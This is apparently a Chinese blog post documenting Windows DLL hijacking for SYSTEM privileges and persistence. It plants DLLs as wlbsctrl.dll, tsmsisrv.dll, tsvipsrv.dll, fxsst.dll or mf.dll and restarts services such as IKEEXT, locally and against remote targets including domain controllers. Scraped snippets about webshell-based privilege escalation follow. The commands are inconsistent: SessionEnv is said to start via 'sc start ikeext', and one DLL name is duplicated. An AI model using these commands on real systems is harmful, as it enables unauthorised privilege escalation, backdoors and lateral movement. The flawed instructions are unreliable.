win7提權system與後門

2021-10-10 14:45:22 字數 2266 閱讀 1531

查考文章

今天看了一篇文章,發現文章中的利用方法只能在win7上使用,無法在win10上使用,特做記錄。

實現效果:

得到後門執行並得到system許可權。

ikeext(ike and authip ipsec keying modules)服務在啟動時會載入wlbsctrl.dll,但windows系統預設配置下該dll不存在,如果我們將自己的dll放在這個位置,在服務啟動時就能載入該dll.

copy calc_x64.dll c:\windows\system32\wlbsctrl.dll

sc query ikeext

sc stop ikeext

sc start ikeext

遠端執行:

copy calc_x64.dll \\target\c$\windows\system32\wlbsctrl.dll

sc \\target query ikeext

sc \\target stop ikeext

sc \\target start ikeext

sessionenv(remote desktop configuration)服務在啟動時會載入c:\windows\system32\tsmsisrv.dll和c:\windows\system32\tsvipsrv.dll,但windows系統預設配置下這兩個dll不存在,如果我們將自己的dll放在這個位置,在服務啟動時就能載入該dll,啟動sessionenv服務方法為sc start ikeext。

利用命令:

copy calc_x64.dll c:\windows\system32\tsmsisrv.dll

sc query ikeext

sc stop ikeext

sc start ikeext

或者copy calc_x64.dll c:\windows\system32\tsvipsrv.dll

sc query ikeext

sc stop ikeext

sc start ikeext

遠端執行的用法:

copy calc_x64.dll \\target\c$\windows\system32\tsmsisrv.dll

sc \\target query ikeext

sc \\target stop ikeext

sc \\target start ikeext

或者copy calc_x64.dll \\target\c$\windows\system32\tsvipsrv.dll

sc \\target query ikeext

sc \\target stop ikeext

sc \\target start ikeext

如果系統開啟了遠端桌面的功能(支援遠端連線到此計算機),就會開啟sessionenv(remote desktop configuration)服務,如果我們在c:\windows\system32\下寫入tsmsisrv.dll或tsvipsrv.dll,就能在服務啟動時載入該dll,實現**執行。

應用場景:

獲得域控制器檔案的遠端訪問許可權,但無法遠端執行命令.

1.如果域控制器未開啟遠端桌面的功能,在系統啟動時劫持explorer.exe對fxsst.dll的載入

寫入檔案c:\windows\fxsst.dll

2.如果域控制器開啟了遠端桌面的功能,在系統啟動時將開啟sessionenv服務,載入tsmsisrv.dll或tsvipsrv.dll

寫入檔案c:\windows\system32\tsmsisrv.dll或c:\windows\system32\tsmsisrv.dll

3.如果域控制器開啟了遠端桌面的功能,在使用者進行遠端桌面連線時將會載入mf.dll

實際測試:

測試環境: server2012r2 x64

寫入檔案c:\windows\system32\mf.dll,命令如下:

《lateral movement — scm and dll hijacking primer》的利用擴充套件

2019 12 10 win7,win12提權練習

一 win7 1,上傳webshell到伺服器,訪問 2,因為win7許可權沒設定好,導致任何命令都可以執行 直接提權成功,還可以通過msf工具利用exp進行提權,今天太晚了就先不做了 二 win2012 1,將寫好的大馬放到web伺服器上 2,測試機進行訪問大馬,執行whoami執行成功,是iis...

如何用程式刪除win 7下SYSTEM許可權的目錄

win7系統由於安裝程式等操作,可能會在系統中留下一些所有許可權是system角色的目錄,例如我的系統以前在c盤的qq解除安裝後的遺留檔案 下圖 system是windows系統中最高許可權角色 組 比administrator使用者許可權高,這樣的目錄無法手工刪除。網上給的方法是右鍵點選資料夾 屬...

如何讓Win7不再彈出公升級Win10的提醒視窗

hkey local machine software policies microsoft windows gwxps 鑑於修改登錄檔有風險,所以建議修改前備份登錄檔,或者建立系統還原點,以便出現問題時恢復。在右側窗格中新建名為disablegwx的dword 32位 值,雙擊該值,把數值資料設定...